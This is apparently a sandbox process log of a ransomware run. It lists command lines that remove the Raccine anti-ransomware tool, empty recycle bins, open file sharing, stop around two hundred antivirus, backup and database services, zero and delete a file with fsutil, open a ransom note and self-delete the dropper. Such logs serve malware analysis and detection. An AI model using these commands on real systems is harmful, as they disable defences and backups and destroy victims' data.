taskkill.exe "taskkill" /F /IM RaccineSettings.exe
7960reg.exe "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
8800reg.exe "reg" delete HKCU\Software\Raccine /F
4716schtasks.exe "schtasks" /DELETE /TN "Raccine Rules Updater" /F
2848cmd.exe "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
6200cmd.exe "cmd.exe" /c rd /s /q D:\\$Recycle.bin
4496sc.exe "sc.exe" config Dnscache start= auto
4120sc.exe "sc.exe" config FDResPub start= auto
8772sc.exe "sc.exe" config SQLTELEMETRY start= disabled
6080netsh.exe "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
3180sc.exe "sc.exe" config SSDPSRV start= auto
8248sc.exe "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
4104sc.exe "sc.exe" config SstpSvc start= disabled
2736netsh.exe "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
7304sc.exe "sc.exe" config upnphost start= auto
6688sc.exe "sc.exe" config SQLWriter start= disabled
2000net1.exe C:\Windows\system32\net1 start Dnscache /y
8116net1.exe C:\Windows\system32\net1 start FDResPub /y
5228net1.exe C:\Windows\system32\net1 stop bedbg /y
4180net1.exe C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
1808net1.exe C:\Windows\system32\net1 start SSDPSRV /y
3232net1.exe C:\Windows\system32\net1 stop avpsus /y
5376net1.exe C:\Windows\system32\net1 stop EhttpSrv /y
3512net1.exe C:\Windows\system32\net1 start upnphost /y
5800net1.exe C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
8388net1.exe C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
3052net1.exe C:\Windows\system32\net1 stop MMS /y
7408net1.exe C:\Windows\system32\net1 stop mfewc /y
5468net1.exe C:\Windows\system32\net1 stop ekrn /y
4896net1.exe C:\Windows\system32\net1 stop ccEvtMgr /y
2824net1.exe C:\Windows\system32\net1 stop mozyprobackup /y
6628net1.exe C:\Windows\system32\net1 stop BMR Boot Service /y
5208net1.exe C:\Windows\system32\net1 stop MSSQL$TPS /y
5544net1.exe C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
7696net1.exe C:\Windows\system32\net1 stop ccSetMgr /y
6908net1.exe C:\Windows\system32\net1 stop EPSecurityService /y
2996net1.exe C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
3092net1.exe C:\Windows\system32\net1 stop EPUpdateService /y
3764net1.exe C:\Windows\system32\net1 stop SavRoam /y
3116net1.exe C:\Windows\system32\net1 stop DefWatch /y
3792net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
8716net1.exe C:\Windows\system32\net1 stop ntrtscan /y
9072net1.exe C:\Windows\system32\net1 stop RTVscan /y
4692net1.exe C:\Windows\system32\net1 stop QBFCService /y
6828net1.exe C:\Windows\system32\net1 stop EsgShKernel /y
7744net1.exe C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
240net1.exe C:\Windows\system32\net1 stop VSNAPVSS /y
2804net1.exe C:\Windows\system32\net1 stop QBIDPService /y
8260net1.exe C:\Windows\system32\net1 stop PDVFSService /y
5588net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
3572net1.exe C:\Windows\system32\net1 stop VeeamTransportSvc /y
6248net1.exe C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1320net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
4700net1.exe C:\Windows\system32\net1 stop KAVFS /y
2676net1.exe C:\Windows\system32\net1 stop VeeamDeploymentService /y
7844net1.exe C:\Windows\system32\net1 stop QBCFMonitorService /y
7020net1.exe C:\Windows\system32\net1 stop ESHASRV /y
3740net1.exe C:\Windows\system32\net1 stop SQLWriter /y
6416net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc /y
2440net1.exe C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
3964net1.exe C:\Windows\system32\net1 stop YooBackup /y
1052net1.exe C:\Windows\system32\net1 stop SDRSVC /y
8980net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
6184net1.exe C:\Windows\system32\net1 stop veeam /y
7388net1.exe C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
8548net1.exe C:\Windows\system32\net1 stop YooIT /y
7940net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
4772net1.exe C:\Windows\system32\net1 stop KAVFSGT /y
7908net1.exe C:\Windows\system32\net1 stop PDVFSService /y
2508net1.exe C:\Windows\system32\net1 stop BackupExecJobEngine /y
4900net1.exe C:\Windows\system32\net1 stop zhudongfangyu /y
7524net1.exe C:\Windows\system32\net1 stop VeeamBackupSvc /y
5116net1.exe C:\Windows\system32\net1 stop FA_Scheduler /y
5012net1.exe C:\Windows\system32\net1 stop BackupExecVSSProvider /y
3356net1.exe C:\Windows\system32\net1 stop stc_raw_agent /y
8644net1.exe C:\Windows\system32\net1 stop BackupExecManagementService /y
3036net1.exe C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
3328net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
4020net1.exe C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1844net1.exe C:\Windows\system32\net1 stop BackupExecRPCService /y
2092net1.exe C:\Windows\system32\net1 stop CASAD2DWebSvc /y
2384net1.exe C:\Windows\system32\net1 stop VeeamBrokerSvc /y
7188net1.exe C:\Windows\system32\net1 stop ReportServer /y
3636net1.exe C:\Windows\system32\net1 stop kavfsslp /y
5068net1.exe C:\Windows\system32\net1 stop AcrSch2Svc /y
5700net1.exe C:\Windows\system32\net1 stop MSSQLServerADHelper /y
3912net1.exe C:\Windows\system32\net1 stop AcronisAgent /y
5232net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
5392net1.exe C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
2104net1.exe C:\Windows\system32\net1 stop CAARCUpdateSvc /y
4796net1.exe C:\Windows\system32\net1 stop sophos /y
5064net1.exe C:\Windows\system32\net1 stop UI0Detect /y
4296net1.exe C:\Windows\system32\net1 stop klnagent /y
3108net1.exe C:\Windows\system32\net1 stop MsDtsServer110 /y
3276net1.exe C:\Windows\system32\net1 stop VeeamCatalogSvc /y
7796net1.exe C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
2272net1.exe C:\Windows\system32\net1 stop MSExchangeSA /y
1040net1.exe C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
8764net1.exe C:\Windows\system32\net1 stop McAfeeEngineService /y
5184net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
6500net1.exe C:\Windows\system32\net1 stop POP3Svc /y
2664net1.exe C:\Windows\system32\net1 stop MsDtsServer /y
5044net1.exe C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
7732net1.exe C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
3432net1.exe C:\Windows\system32\net1 stop macmnsvc /y
3228net1.exe C:\Windows\system32\net1 stop MSExchangeMGMT /y
2328net1.exe C:\Windows\system32\net1 stop ReportServer$TPS /y
4024net1.exe C:\Windows\system32\net1 stop IISAdmin /y
5256net1.exe C:\Windows\system32\net1 stop McAfeeFramework /y
6116net1.exe C:\Windows\system32\net1 stop VeeamCloudSvc /y
4012net1.exe C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
6420net1.exe C:\Windows\system32\net1 stop MSExchangeES /y
7680net1.exe C:\Windows\system32\net1 stop “Sophos Clean Service” /y
3632net1.exe C:\Windows\system32\net1 stop VeeamMountSvc /y
5084net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
5672net1.exe C:\Windows\system32\net1 stop SMTPSvc /y
3436net1.exe C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
2608net1.exe C:\Windows\system32\net1 stop “Sophos Agent” /y
8692net1.exe C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
5328net1.exe C:\Windows\system32\net1 stop masvc /y
1920net1.exe C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
8476net1.exe C:\Windows\system32\net1 stop W3Svc /y
7348net1.exe C:\Windows\system32\net1 stop EraserSvc11710 /y
8872net1.exe C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
2744net1.exe C:\Windows\system32\net1 stop VeeamDeploymentService /y
3784net1.exe C:\Windows\system32\net1 stop MSExchangeSRS /y
8048net1.exe C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
8984net1.exe C:\Windows\system32\net1 stop “Enterprise Client Service” /y
8544net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc /y
988net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1292net1.exe C:\Windows\system32\net1 stop “Sophos Health Service” /y
6476net1.exe C:\Windows\system32\net1 stop msftesql$PROD /y
1684net1.exe C:\Windows\system32\net1 stop “SQL Backups /y
1304net1.exe C:\Windows\system32\net1 stop MBAMService /y
7356net1.exe C:\Windows\system32\net1 stop MySQL57 /y
3936net1.exe C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
6988net1.exe C:\Windows\system32\net1 stop SstpSvc /y
8168net1.exe C:\Windows\system32\net1 stop MsDtsServer100 /y
6696net1.exe C:\Windows\system32\net1 stop VeeamDeploySvc /y
7824net1.exe C:\Windows\system32\net1 stop McShield /y
5280net1.exe C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
6596net1.exe C:\Windows\system32\net1 stop NetMsmqActivator /y
6804net1.exe C:\Windows\system32\net1 stop MSExchangeMTA /y
7728net1.exe C:\Windows\system32\net1 stop VeeamRESTSvc /y
7800net1.exe C:\Windows\system32\net1 stop MSOLAP$TPS /y
2868net1.exe C:\Windows\system32\net1 stop MSSQLSERVER /y
6112net1.exe C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
6888net1.exe C:\Windows\system32\net1 stop MySQL80 /y
1896net1.exe C:\Windows\system32\net1 stop MSExchangeIS /y
6064net1.exe C:\Windows\system32\net1 stop MBEndpointAgent /y
8196net1.exe C:\Windows\system32\net1 stop “aphidmonitorservice” /y
4156net1.exe C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
6048net1.exe C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
5584net1.exe C:\Windows\system32\net1 stop McTaskManager /y
5684net1.exe C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
5620net1.exe C:\Windows\system32\net1 stop msexchangeadtopology /y
8140net1.exe C:\Windows\system32\net1 stop “Symantec System Recovery” /y
7236net1.exe C:\Windows\system32\net1 stop mfefire /y
2456net1.exe C:\Windows\system32\net1 stop VeeamTransportSvc /y
6940net1.exe C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
3828net1.exe C:\Windows\system32\net1 stop SamSs /y
1308net1.exe C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1136net1.exe C:\Windows\system32\net1 stop wbengine /y
4788net1.exe C:\Windows\system32\net1 stop AcrSch2Svc /y
4604net1.exe C:\Windows\system32\net1 stop OracleClientCache80 /y
6788net1.exe C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
6784net1.exe C:\Windows\system32\net1 stop BackupExecRPCService /y
5552net1.exe C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
6712net1.exe C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
8484net1.exe C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
4876net1.exe C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
3184net1.exe C:\Windows\system32\net1 stop SepMasterService /y
9152net1.exe C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
3340net1.exe C:\Windows\system32\net1 stop mfemms /y
6572net1.exe C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
1004net1.exe C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
8092net1.exe C:\Windows\system32\net1 stop audioendpointbuilder /y
2820net1.exe C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
4100net1.exe C:\Windows\system32\net1 stop wbengine /y
8112net1.exe C:\Windows\system32\net1 stop msexchangeimap4 /y
4420net1.exe C:\Windows\system32\net1 stop AVP /y
2164net1.exe C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
6036net1.exe C:\Windows\system32\net1 stop ShMonitor /y
1240net1.exe C:\Windows\system32\net1 stop RESvc /y
6756net1.exe C:\Windows\system32\net1 stop “Sophos MCS Client” /y
3404net1.exe C:\Windows\system32\net1 stop BackupExecVSSProvider /y
8976net1.exe C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
6964net1.exe C:\Windows\system32\net1 stop SQLAgent$PROD /y
4508net1.exe C:\Windows\system32\net1 stop mfevtp /y
6800net1.exe C:\Windows\system32\net1 stop ARSM /y
8288net1.exe C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
7580net1.exe C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
6368net1.exe C:\Windows\system32\net1 stop sms_site_sql_backup /y
4928net1.exe C:\Windows\system32\net1 stop Smcinst /y
7276net1.exe C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
1544net1.exe C:\Windows\system32\net1 stop DCAgent /y
5532net1.exe C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1836net1.exe C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
4052net1.exe C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
8804net1.exe C:\Windows\system32\net1 stop unistoresvc_1af40a /y
7804net1.exe C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
9368net1.exe C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
9344net1.exe C:\Windows\system32\net1 stop SmcService /y
9500net1.exe C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
9680net1.exe C:\Windows\system32\net1 stop “Sophos Message Router” /y
9704net1.exe C:\Windows\system32\net1 stop swi_filter /y
9796notepad.exe "C:\Windows\System32\notepad.exe" C:\Users\test22\Desktop\RESTORE_FILES_INFO.txt
9468net1.exe C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
9924net1.exe C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
10020net1.exe C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
10192net1.exe C:\Windows\system32\net1 stop SQLTELEMETRY /y
9320cmd.exe "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
10000PING.EXE ping 127.0.0.7 -n 3
9380fsutil.exe fsutil file setZeroData offset=0 length=524288 “%s”
8408net1.exe C:\Windows\system32\net1 stop SQLAgent$TPS /y
9408cmd.exe "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\client1122.exe
10128choice.exe choice /C Y /N /D Y /T 3
6508explorer.exe C:\Windows\Explorer.EXE
1848